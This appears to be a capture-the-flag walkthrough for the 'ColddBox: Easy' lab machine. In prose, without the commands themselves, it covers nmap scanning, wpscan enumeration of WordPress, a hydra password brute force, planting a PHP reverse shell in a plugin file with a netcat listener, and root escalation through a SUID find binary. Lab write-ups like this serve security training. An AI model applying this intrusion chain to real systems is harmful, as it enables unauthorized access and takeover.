ColddBox: Easy
Reconnaissance
Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)
Detailed Nmap Scan :
Command Breakdown:
(-sV): Service version
(-sC): Default nmap scripts
(-p): Specifying ports 80
(-oN nmap): Saving it into a file called nmap
Enumeration
Lets visit the site
Looks like a well made page, while looking through the website I found a login page.
Also looking at the nmap scan, we know that WordPress 4.1.31
is running, also there is a Wordpress scanner called wpscan
, lets use it to find more information.
Looking at the output, we find some interesting information
Lets use hydra
to bruteforce and find atleast one password for one of the users. I saved the usernames in a file called users
.
Exploitation
Lets now use hydra to crack the password
And we get the password, lets login
We are logged in. For getting a reverse shell on the machine we have to add a reverse shell that you can find here. First lets go to the Plugins
tab and then replace one of the plugins with the php reverse shell, also make sure to change the IP to yours.
After changing it, click update file and start a netcat listener.
Then navigate to the page.
You should get a reverse shell. Lets stabilize the shell.
Privilege Escalation
Lets look for SUIDs
that we can exploit.
We have /usr/bin/find
, lets go to GTFOBins
and find the command to privilege escalate.
Lets use the second command
We are now root.
Last updated